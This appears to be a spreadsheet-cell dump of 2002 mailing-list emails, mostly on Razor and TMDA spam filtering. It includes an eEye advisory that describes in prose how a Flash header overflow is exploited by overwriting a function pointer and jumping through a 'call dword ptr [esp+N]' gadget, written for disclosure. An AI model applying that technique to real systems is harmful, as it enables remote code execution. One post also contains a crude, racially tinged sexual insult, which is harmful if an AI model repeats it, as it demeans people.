    <t>Re: [ILUG] TMDA (WAS --&gt; slashdot EW Dijkstra humor]</t>
  </si>
  <si>
    <t>On Thu, 8 Aug 2002, kevin lyda wrote:\n\n&gt; the more the merrier\n\nindeed.\n\n&gt; - makes it harder for spammers to do their work. however, tmda isn't\n&gt; an smtp proxy normally.\n\nwell, smtp being store and forward, what is an smtp proxy? :) that's \nwhy i said "proxy".\n\nprobably, the most effective way to stop spam in the long-term is to \nconfigure your email server to use the SPEWS blacklist and a good open \nrelay blacklist.\n\nSPEWS: to force ISPs to take action against spammers \n\nSPEWS /will/ list entire ISP netblocks /if/ the ISP consistently\nignores/fails to take action on abuse reports over the course of\nseveral months. however, they're pretty quick at delisting once action\nis taken. in the long-term, and in absence of global and effective \nanti-UCE regulations, it's the only realistic way to get to a spam \nfree internet.\n\nOpen relay lists: to protect against relays obviously.\n\n&gt; kevin\n\nregards,\n-- \nPaul Jakma	Sys Admin	Alphyra\n	paulj@alphyra.ie\nWarning: /never/ send email to spam@dishone.st or trap@dishone.st\n\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: kevin lyda &lt;kevin+dated+1029247658.5c0939@ie.suberic.net&gt;\nFrom: Paul Jakma &lt;paulj@alphyra.ie&gt;\nDate: Thu, 8 Aug 2002 19:44:11 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 19:44:11 +0100 (IST)</t>
  </si>
  <si>
    <t>kevin lyda &lt;kevin+dated+1029247658.5c0939@ie.suberic.net&gt;</t>
  </si>
  <si>
    <t>On Thu, 8 Aug 2002, Paul Jakma wrote:\n\n&gt; unfortunately, often spammers provide real return addresses - just not \n&gt; their own.\n&gt; \n&gt; so if everyone used tmda, these poor unfortunates would receive\n&gt; millions of tmda confirm messages, in addition to the hundred thousand\n&gt; 'undeliverable' messages that they already get..\n\n	[URL]http://messagewall.org[/URL]\n\nsame concept as tmda (smtp "proxy") but not as extreme as tmda.net - \ndnsbl, distributed checksum and various other checks.\n\nregards,\n-- \nPaul Jakma	Sys Admin	Alphyra\n	paulj@alphyra.ie\nWarning: /never/ send email to spam@dishone.st or trap@dishone.st\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>http://messagewall.org http://www.linux.ie</t>
  </si>
  <si>
    <t>To: kevin lyda &lt;kevin+dated+1029247658.5c0939@ie.suberic.net&gt;\nFrom: Paul Jakma &lt;paulj@alphyra.ie&gt;\nDate: Thu, 8 Aug 2002 19:24:31 +0100 (IST)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 19:24:31 +0100 (IST)</t>
  </si>
  <si>
    <t>On Thu, 8 Aug 2002, kevin lyda wrote:\n\n&gt; i'm certain they already do strip after the +.  however, they'll\n&gt; have to respond to a confirm message when they send to my raw\n&gt; address.  and responding to a confirm message requires spammers to\n&gt; provide a real email address (which i can then blacklist - i've\n&gt; mapped y in mutt to whitelist; Y to blacklist) and effectively send\n&gt; the spam to each individual (which makes spamming more expensive\n&gt; bandwidthwise for the spammer).\n\nunfortunately, often spammers provide real return addresses - just not \ntheir own.\n\nso if everyone used tmda, these poor unfortunates would receive\nmillions of tmda confirm messages, in addition to the hundred thousand\n'undeliverable' messages that they already get..\n\n&gt; kevin\n\nregards,\n-- \nPaul Jakma	Sys Admin	Alphyra\n	paulj@alphyra.ie\nWarning: /never/ send email to spam@dishone.st or trap@dishone.st\n\n\n-- \nIrish Linux Users' Group: ilug@linux.ie\n[URL]http://www.linux.ie[/URL] for (un)subscription information.\nList maintainer: listmaster@linux.ie</t>
  </si>
  <si>
    <t>To: "Jordan Ritter" &lt;jpr5@darkridge.com&gt;,\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 18:22:50 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 18:22:50 -0400</t>
  </si>
  <si>
    <t>"Jordan Ritter" &lt;jpr5@darkridge.com&gt;,</t>
  </si>
  <si>
    <t>RE: [Razor-users] Re: intentions</t>
  </si>
  <si>
    <t>Yeh it sure would be nice to have more info on Tes.  That would end all\nthe confusion. \n\nCan Spamassassin be considered a competing product when it's typically\nused in conjunction with Razor?\n\n-----Original Message-----\nFrom: Jordan Ritter [mailto:jpr5@darkridge.com] \nSent: Thursday, August 08, 2002 6:09 PM\nTo: Craig R . Hughes; razor-users@example.sourceforge.net\nSubject: [Razor-users] Re: intentions\n\n\nCraig,\n\n    I don't really understand how you can make the claims that you\n    make without a full understanding of TeS, which you can't have\n    because we haven't published the details.\n\n    In the end, given that you don't know much about TeS or how it\n    works, your statements really call into question your intentions\n    given that you have a competing product in this space.\n\nRegards,\n\n--jordan\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Steve Price &lt;steve@havk.org&gt;\nDate: Thu, 8 Aug 2002 17:32:54 -0500</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 17:32:54 -0500</t>
  </si>
  <si>
    <t>Steve Price &lt;steve@havk.org&gt;</t>
  </si>
  <si>
    <t>[Razor-users] false-positive found</t>
  </si>
  <si>
    <t>Razor v1 just called a post to the mutt-users mailing list SPAM\nwith the following signature.\n\n        b230a8ed84eb262bed1f2c908703990d3483b55f\n\nBTW, is there are another way for us folks still using v1 to\nrevoke false-positives such as this without posting to the list?\n\nThanks.\n\n-steve\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "vulwatch" &lt;vulnwatch@vulnwatch.org&gt;\nFrom: "Marc Maiffret" &lt;marc@eeye.com&gt;\nDate: Thu, 8 Aug 2002 17:26:22 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 17:26:22 -0700</t>
  </si>
  <si>
    <t>"Marc Maiffret" &lt;marc@eeye.com&gt;</t>
  </si>
  <si>
    <t>"vulwatch" &lt;vulnwatch@vulnwatch.org&gt;</t>
  </si>
  <si>
    <t>[VulnWatch] EEYE: Macromedia Shockwave Flash Malformed Header Overflow</t>
  </si>
  <si>
    <t>Macromedia Shockwave Flash Malformed Header Overflow\n\nRelease Date: August 8, 2002\n\nSeverity:\nHigh (Remote Code Execution)\n\nSystems Affected:\nMacromedia Shockwave Flash - All Versions;\nUnix and Windows; Netscape and Internet Explorer\n\nDescription:\nWhile working on some pre-release eEye Retina CHAM tools, an exploitable\ncondition was discovered within the Shockwave Flash file format called SWF\n(pronounced "SWIF").\n\nSince this is a browser based bug, it makes it trivial to bypass firewalls\nand attack the user at his desktop. Also, application browser bugs allow you\nto target users based on the websites they visit, the newsgroups they read,\nor the mailing lists they frequent. It is a "one button" push attack, and\nusing anonymous remailers or proxies for these attacks is possible.\n\nThis vulnerability has been proven to work with all versions of Macromedia\nFlash on Windows and Unix, through IE and Netscape. It may be run wherever\nShockwave files may be displayed or attached, including: websites, email,\nnews postings, forums, Instant Messengers, and within applications utilizing\nweb-browsing functionality.\n\nTechnical Description:\nThe data header is roughly made out to:\n\n[Flash signature][version (1)][File Length(A number of bytes too\nshort)][frame size (malformed)][Frame Rate (malformed)][Frame Count\n(malformed)][Data]\n\nBy creating a malformed header we can supply more frame data than the\ndecoder is expecting. By supplying enough data we can overwrite a function\npointer address and redirect the flow of control to a specified location as\nsoon as this address is used. At the moment the overwritten address takes\ncontrol flow, an address pointing to a portion of our data is 8 bytes back\nfrom the stack pointer. By using a relative jump we redirect flow into a\n"call dword ptr [esp+N]", where N is the number of bytes from the stack\npointer. These "jump points" can be located in multiple loaded dll's. By\ncreating a simple tool using the debugging API and ReadMemory, you can\nexamine a process's virtual address space for useful data to help you with\nyour exploitation.\n\nThis is not to say other potentially vulnerable situations have not been\nfound in Macromedia's Flash. We discovered about seventeen others before we\nended our testing. We are working with Macromedia on these issues.\n\nProtection:\nRetina(R) Network Security Scanner already scans for this latest version of\nFlash on users' systems. Ensure all users within your control upgrade their\nsystems.\n\nVendor Status:\nMacromedia has released a patch for this vulnerability, available at:\n[URL]http://www.macromedia.com[/URL]\nPSB02%2D09%20%2D%20Macromedia%20Flash%20Malformed%20Header%20Vulnerability%2\n0Issue&amp;Cache=False\n\nDiscovery: Drew Copley\nExploitation: Riley Hassell\n\nGreetings: Hacktivismo!, Centra Spike\n\nCopyright (c) 1998-2002 eEye Digital Security\nPermission is hereby granted for the redistribution of this alert\nelectronically. It is not to be edited in any way without express consent of\neEye. If you wish to reprint the whole or any part of this alert in any\nother medium excluding electronic medium, please e-mail alert@eEye.com for\npermission.\n\nDisclaimer\nThe information within this paper may change without notice. Use of this\ninformation constitutes acceptance for use in an AS IS condition. There are\nNO warranties with regard to this information. In no event shall the author\nbe liable for any damages whatsoever arising out of or in connection with\nthe use or spread of this information. Any use of this information is at the\nuser's own risk.\n\nFeedback\nPlease send suggestions, updates, and comments to:\n\neEye Digital Security\n[URL]http://www.eEye.com[/URL]\ninfo@eEye.com</t>
  </si>
  <si>
    <t>http://www.macromedia.com http://www.eEye.com</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 17:21:17 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 17:21:17 -0400</t>
  </si>
  <si>
    <t>RE: [Razor-users] keep submitting known spam?</t>
  </si>
  <si>
    <t>If you're an ISP or running a good size mail server and you submit 2-5\nthousands messages a day regardless if it's already been submitted,\nwould your rating go up faster offsetting the drop from revokes?\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Adam L. Beberg" &lt;beberg@mithral.com&gt;\nFrom: Tom &lt;tomwhore@slack.net&gt;\nDate: Thu, 8 Aug 2002 17:21:16 -0400 (EDT)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 17:21:16 -0400 (EDT)</t>
  </si>
  <si>
    <t>Re: Perhaps Apple isn't as user-friendly as we thought...</t>
  </si>
  <si>
    <t>On Thu, 8 Aug 2002, Adam L. Beberg wrote:\n\n--]Yea, Apple sucks, my crappy iMac hasn't crashed once in 2 years.\n\nWhen all you do on it is pout on emaillists and watch asain bukaky porn\nwheres the strain?\n\nStriken as anecdotal...oh and I had a win98 box running wsmf server stuffs\n(apache, dbs, shoutcast etc) up on dsl without so much as a hicup for over 1.5 years\nother than the various game realted hijinks tribes would pull. So if its\nraw uptime ou want,....tools and craftsman time. Thus once again uptime\nfawl down go boom.\n\n-tom\n\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>To: "Jordan Ritter" &lt;jpr5@darkridge.com&gt;,\nFrom: "Rose, Bobby" &lt;brose@med.wayne.edu&gt;\nDate: Thu, 8 Aug 2002 17:17:05 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 17:17:05 -0400</t>
  </si>
  <si>
    <t>I'm one of the 30,000 but it's not working very well this week with the\nTES updates and servers not syncing.  \n\n-----Original Message-----\nFrom: Jordan Ritter [mailto:jpr5@darkridge.com] \nSent: Thursday, August 08, 2002 4:45 PM\nTo: razor-users@example.sourceforge.net\nSubject: Re: [Razor-users] What's wrong with the Razor servers now?\n\n\nOn Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:\n\n# Razor2 seems to have been a long time in coming, [...] and doesn't #\ncurrently work.\n\nQuite a strong statement, Craig, one which over 30,000 active users a\nday would strongly disagree with.\n\n\n--jordan\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Chip Paswater &lt;turk182@chipware.net&gt;\nDate: Thu, 8 Aug 2002 16:27:11 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 16:27:11 -0700</t>
  </si>
  <si>
    <t>Chip Paswater &lt;turk182@chipware.net&gt;</t>
  </si>
  <si>
    <t>[Razor-users] SpamNet question</t>
  </si>
  <si>
    <t>Vipul, can I ask questions about SpamNet here?\n\nI hope so, here goes.. simple question.  How do you define\nusername/passwords in spamnet?  I don't see any fields for this option, so\nI'm assuming when someone connects with SpamNet for the first time, they're\ngiven a unique ID that they keep until they change to a new Outlook client?\n\nIt would be nice if you could specify which username/password to use.  I'd\nlike to share my trust account between my work(outlook) and my personal(mutt)\nemail accounts.\n\n&gt; &gt; Perhaps a feature can be added to razor-report, so that it checks whether a\n&gt; &gt; message is spam before it submits it.  If it is spam, then don't send the\n&gt; &gt; body, 4 signatures, etc, just up the "rating" for that individual spam.\n&gt; \n&gt; Yep, that how razor-agents currently work.\n&gt; \n&gt; cheers,\n&gt; vipul.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: &lt;razor-users@example.sourceforge.net&gt;\nFrom: "Sven Willenberger" &lt;sven@dmv.com&gt;\nDate: Thu, 8 Aug 2002 16:12:00 -0400</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 16:12:00 -0400</t>
  </si>
  <si>
    <t>Re: [Razor-users] Using Razor with non-mbox files</t>
  </si>
  <si>
    <t>&gt; ----- Original Message -----\n&gt; Date: Thu, 08 Aug 2002 11:58:36 -0400\n&gt; From: wertzscott@cs.com\n&gt; To: razor-users@example.sourceforge.net\n&gt; Subject: [Razor-users] Using Razor with non-mbox files\n&gt;\n&gt; Greetings!  I'm new to this list, and new to Razor.  Trying to get it to\ncompile now (perhaps more on that later), but I'm wondering if it can really\ndo what I need anyway.  In short my question is whether Razor can process\nfiles directly from sendmail's queues.  Here's the situation.\n&gt;\n\nYou can use a milter with sendmail that will add an X-header labeling the\nmail as spam for procmail processing later (see smrazor:\n[URL]http://www.sapros.com[/URL] ). You can modify the .c file to reject the\nemail instead. I have been using this with sendmail 8.12.5 and Solaris 9\nwith razor-agents 2.14 quite successfully (barring network/catalogue server\nissues) ...\n\nSven\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>http://www.sapros.com http://thinkgeek.com https://lists.sourceforge.net</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 8 Aug 2002 15:56:57 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:56:57 -0700</t>
  </si>
  <si>
    <t>Craig, \n\nThe problems with missing hashes are being addressed I write this. It\nshould be fixed soon and it has nothing to do with TeS algorithms.\n\ncheers,\nvipul.\n\nOn Thu, Aug 08, 2002 at 03:17:52PM -0700, Craig R . Hughes wrote:\n&gt; I'm talking specifically about the last ~24 hours where it seems \n&gt; like things have not been working.  People who've been using the \n&gt; Outlook plugin have been telling me they've been seeing really \n&gt; bad performance, which I've been attributing to the problems \n&gt; which have been discussed here and on sa-talk.  I'm not saying \n&gt; it's completely not working, or that it has no chance of being \n&gt; fixed 15 minutes from now, just that it's not currently working, \n&gt; and there have been a number of "hiccup" periods in the last \n&gt; couple months.  Plus, it's hard to deny that we don't know yet \n&gt; if the trust network is going to work or not -- it only just got \n&gt; switched on, and that changeover seems to have corresponded with \n&gt; people noticing things have stopped working right.\n&gt; \n&gt; C\n&gt; \n&gt; On Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:\n&gt; \n&gt; &gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:\n&gt; &gt;\n&gt; &gt; # Razor2 seems to have been a long time in coming, [...] and doesn't\n&gt; &gt; # currently work.\n&gt; &gt;\n&gt; &gt; Quite a strong statement, Craig, one which over 30,000 active users a\n&gt; &gt; day would strongly disagree with.\n&gt; &gt;\n&gt; &gt;\n&gt; &gt; --jordan\n&gt; &gt;\n&gt; \n&gt; \n&gt; \n&gt; -------------------------------------------------------\n&gt; This sf.net email is sponsored by:ThinkGeek\n&gt; Welcome to geek heaven.\n&gt; [URL]http://thinkgeek.com[/URL]\n&gt; _______________________________________________\n&gt; Razor-users mailing list\n&gt; Razor-users@lists.sourceforge.net\n&gt; [URL]https://lists.sourceforge.net[/URL]\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: razor-users@example.sourceforge.net\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 8 Aug 2002 15:43:03 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:43:03 -0700</t>
  </si>
  <si>
    <t>Re: [Razor-users] keep submitting known spam?</t>
  </si>
  <si>
    <t>On Thu, Aug 08, 2002 at 03:26:38PM -0700, Chip Paswater wrote:\n&gt; \n&gt; Perhaps a feature can be added to razor-report, so that it checks whether a\n&gt; message is spam before it submits it.  If it is spam, then don't send the\n&gt; body, 4 signatures, etc, just up the "rating" for that individual spam.\n\nYep, that how razor-agents currently work.\n\ncheers,\nvipul.\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: nan\nFrom: Chip Paswater &lt;turk182@chipware.net&gt;\nDate: Thu, 8 Aug 2002 15:26:38 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:26:38 -0700</t>
  </si>
  <si>
    <t>&gt; &gt; To reiterate, the idea behind Razor is to turn 1 bit of \n&gt; &gt; information from\n&gt; &gt; the user (this message is or isn't spam) into a comprehensive \n&gt; &gt; filteration\n&gt; &gt; system. Everything from computation of signatures for content\n&gt; &gt; identification, to assignment of confidence and trust, distribution of\n&gt; &gt; signatures, etc is done automagically.\n&gt; \n&gt; Well, a little more than one bit -- you have to transmit the \n&gt; signature, plus now the entire message body.  Plus your ID.  \n&gt; Plus the rights to all intellectual property contained in any \n&gt; email message you submit (I guess technically there are no bits \n&gt; in the rights assignment)\n\nPerhaps a feature can be added to razor-report, so that it checks whether a\nmessage is spam before it submits it.  If it is spam, then don't send the\nbody, 4 signatures, etc, just up the "rating" for that individual spam.\n\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nFrom: "Craig R.Hughes" &lt;craig@deersoft.com&gt;\nDate: Thu, 8 Aug 2002 15:17:52 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:17:52 -0700</t>
  </si>
  <si>
    <t>I'm talking specifically about the last ~24 hours where it seems \nlike things have not been working.  People who've been using the \nOutlook plugin have been telling me they've been seeing really \nbad performance, which I've been attributing to the problems \nwhich have been discussed here and on sa-talk.  I'm not saying \nit's completely not working, or that it has no chance of being \nfixed 15 minutes from now, just that it's not currently working, \nand there have been a number of "hiccup" periods in the last \ncouple months.  Plus, it's hard to deny that we don't know yet \nif the trust network is going to work or not -- it only just got \nswitched on, and that changeover seems to have corresponded with \npeople noticing things have stopped working right.\n\nC\n\nOn Thursday, August 8, 2002, at 01:44  PM, Jordan Ritter wrote:\n\n&gt; On Thu, Aug 08, 2002 at 01:36:15PM -0700, Craig R.Hughes wrote:\n&gt;\n&gt; # Razor2 seems to have been a long time in coming, [...] and doesn't\n&gt; # currently work.\n&gt;\n&gt; Quite a strong statement, Craig, one which over 30,000 active users a\n&gt; day would strongly disagree with.\n&gt;\n&gt;\n&gt; --jordan\n&gt;\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "R. A. Hettinga" &lt;rah@shipwright.com&gt;,\nFrom: rsedc@atlantic.gse.rmit.edu.au\nDate: Thu, 8 Aug 2002 15:12:00 +1000</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:12:00 +1000</t>
  </si>
  <si>
    <t>rsedc@atlantic.gse.rmit.edu.au</t>
  </si>
  <si>
    <t>Re: Palladiated? (was re: wow - palladiated! (Re: Palladium: technical limits and implications))</t>
  </si>
  <si>
    <t>&gt; On Wed, Aug 07, 2002 at 03:08:08PM -0400, R. A. Hettinga wrote:\n&gt; &gt; At 6:54 PM +0100 on 8/7/02, Adam Back wrote:\n&gt; &gt; &gt; Palladiumized\n&gt; &gt;\n&gt; &gt; Palladiated?\n&gt; &gt;\n\nAnd the antonym? Odyssielded. Rhymes with shielded.\n\n[URL]http://homepage.mac.com[/URL]\n\nOdysseus was the first to learned the Palladium Oracles from the Seer Hellenus.\nOdysseus neutralised (neutronised?) Palladium's defence for Troy.\nOdysseus invented the first Trojan Horse.\n\nIncidentally public revelation of the Palladium is supposed to be on\nSeventh Day to the Ides of Jun, i.e. 8th. June. The Newsweek article was\na bit late.\n\n[URL]http://www.clubs.psu.edu[/URL]\n\n\nDavid Chia\n[URL]http://xent.com[/URL]</t>
  </si>
  <si>
    <t>http://homepage.mac.com http://www.clubs.psu.edu http://xent.com</t>
  </si>
  <si>
    <t>To: "Craig R . Hughes" &lt;craig@deersoft.com&gt;,\nFrom: Jordan Ritter &lt;jpr5@darkridge.com&gt;\nDate: Thu, 8 Aug 2002 15:09:25 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:09:25 -0700</t>
  </si>
  <si>
    <t>"Craig R . Hughes" &lt;craig@deersoft.com&gt;,</t>
  </si>
  <si>
    <t>[Razor-users] Re: intentions</t>
  </si>
  <si>
    <t>--f0KYrhQ4vYSV2aJu\nContent-Type: text/plain; charset=us-ascii\nContent-Disposition: inline\n\nCraig,\n\n    I don't really understand how you can make the claims that you\n    make without a full understanding of TeS, which you can't have\n    because we haven't published the details.\n\n    In the end, given that you don't know much about TeS or how it\n    works, your statements really call into question your intentions\n    given that you have a competing product in this space.\n\nRegards,\n\n--jordan\n\n--f0KYrhQ4vYSV2aJu\nContent-Type: application/pgp-signature\nContent-Disposition: inline\n\n-----BEGIN PGP SIGNATURE-----\nVersion: GnuPG v1.0.7 (GNU/Linux)\n\niD8DBQE9UuwVpwQdAVEbU7oRAgPAAKCBgOAqyCLpbBmryq53F7IZo8yvtQCfQYms\n6dk7xDTKr9UIZeG9Z0Y1AZg=\n=7tWy\n-----END PGP SIGNATURE-----\n\n--f0KYrhQ4vYSV2aJu--\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Doug Stewart &lt;zamoose610@yahoo.com&gt;\nDate: Thu, 8 Aug 2002 15:03:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 15:03:39 -0700 (PDT)</t>
  </si>
  <si>
    <t>Naming theories</t>
  </si>
  <si>
    <t>I've noticed that the theories on the interconnection between the latest RH releases is lagging a bit.  In the interests of a fun discussion, anyone have any ideas? So here's some conspiracy bits to lay out.  Can anyone fit the pieces together? "Chesapeake Skipjacks" are a class of boats: [URL]http://carloulton.htmlplanet.com[/URL] Also note: "They were developed from the lines of the Chesapeake Bay Log Canoe, the Brogan, and the famous Clipper Ships." Clipper Ships (Chips)?   Chesapeake College's mascot(s) is(are) the Skipjacks: [URL]http://www.chesapeake.edu[/URL] This guy owns a "Chesapeake 32" named "Valhalla": [URL]http://www.matella.com[/URL] Now, Valhalla -&gt; Limbo seems a little clearer, both being afterlife-ish concepts of roughly Norse extraction. Anyone else? .Doug __________________________________________________ Do You Yahoo!? HotJobs - Search Thousands of New Jobs [URL]http://www.hotjobs.com[/URL] _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://carloulton.htmlplanet.com http://www.chesapeake.edu http://www.matella.com http://www.hotjobs.com http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: "Craig R . Hughes" &lt;craig@deersoft.com&gt;\nFrom: Vipul Ved Prakash &lt;mail@vipul.net&gt;\nDate: Thu, 8 Aug 2002 14:28:59 -0700</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 14:28:59 -0700</t>
  </si>
  <si>
    <t>"Craig R . Hughes" &lt;craig@deersoft.com&gt;</t>
  </si>
  <si>
    <t>Craig, \n\nFor the most part, 99% times 99% users agree on what is spam. This is the\nnature of the spam problem. Now if you were to use a "personal trust"\nsystem, you'd have a huge personal trust group that would include 99% of\nthe userbase. This means 99% times you'd be coming to the same conclusion,\nonly after burning several orders of magnitude more CPU cycles. That would\nbe stupid. Also, it would take several orders of magnitude longer to\nbootstrap and reach effectiveness. Sub-optimal in the extreme.\n\nAs regards to the problems with the "gray" areas you mentioned, servers\nrecognize such content, and razor-agents can use this information to make\nindividual determination. Not to mention, users can set a local confidence\nlevel they are confortable with.\n\ncheers,\nvipul.\n\nOn Thu, Aug 08, 2002 at 01:09:22PM -0700, Craig R . Hughes wrote:\n&gt; By system-trust vs personal trust I don't mean that the system doesn't\n&gt; have a trust rating for each user, but rather that each individual has\n&gt; one system-wide trust rating. Your trust rating for scoring my mail is\n&gt; the same as your trust rating for scoring your own email, or Joe\n&gt; Schmoe's email. You may be great at flagging most spam, but just really\n&gt; bad at flagging one particular piece of controversial mail which is\n&gt; "gray spam" -- ie some people love it, others hate it. Ideally, I should\n&gt; have my own personal trust score for you which agrees with my beliefs\n&gt; about that controversial mail, rather than the system-wide beliefs. If\n&gt; that doesn't happen, then depending on the trust system's weightings,\n&gt; there are 3 possibilities:\n&gt;\n&gt; 1. All "gray" mail is blocked as spam (ie lots of false positives for\n&gt;    individual users)\n&gt; 2. All "gray" mail is allowed through as nonspam (ie lots of false\n&gt;    negatives for individuals)\n&gt; 3. The entire trust system collapses because noone is trusted due to\n&gt;    conflicting votes about "gray" spam.\n\n-- \n\nVipul Ved Prakash          |   "The future is here, it's just not \nSoftware Design Artist     |    widely distributed."\n[URL]http://vipul.net[/URL]          |              -- William Gibson\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "Brian O'Donoghue" &lt;Brian.ODonoghue@kbs.ie&gt;, &lt;ilug@linux.ie&gt;\nFrom: "Ciaran Mac Lochlainn" &lt;ciaran17@eircom.net&gt;\nDate: Thu, 8 Aug 2002 14:26:32 +0100</t>
  </si>
  <si>
    <t>Thu, 8 Aug 2002 14:26:32 +0100</t>
  </si>
  <si>
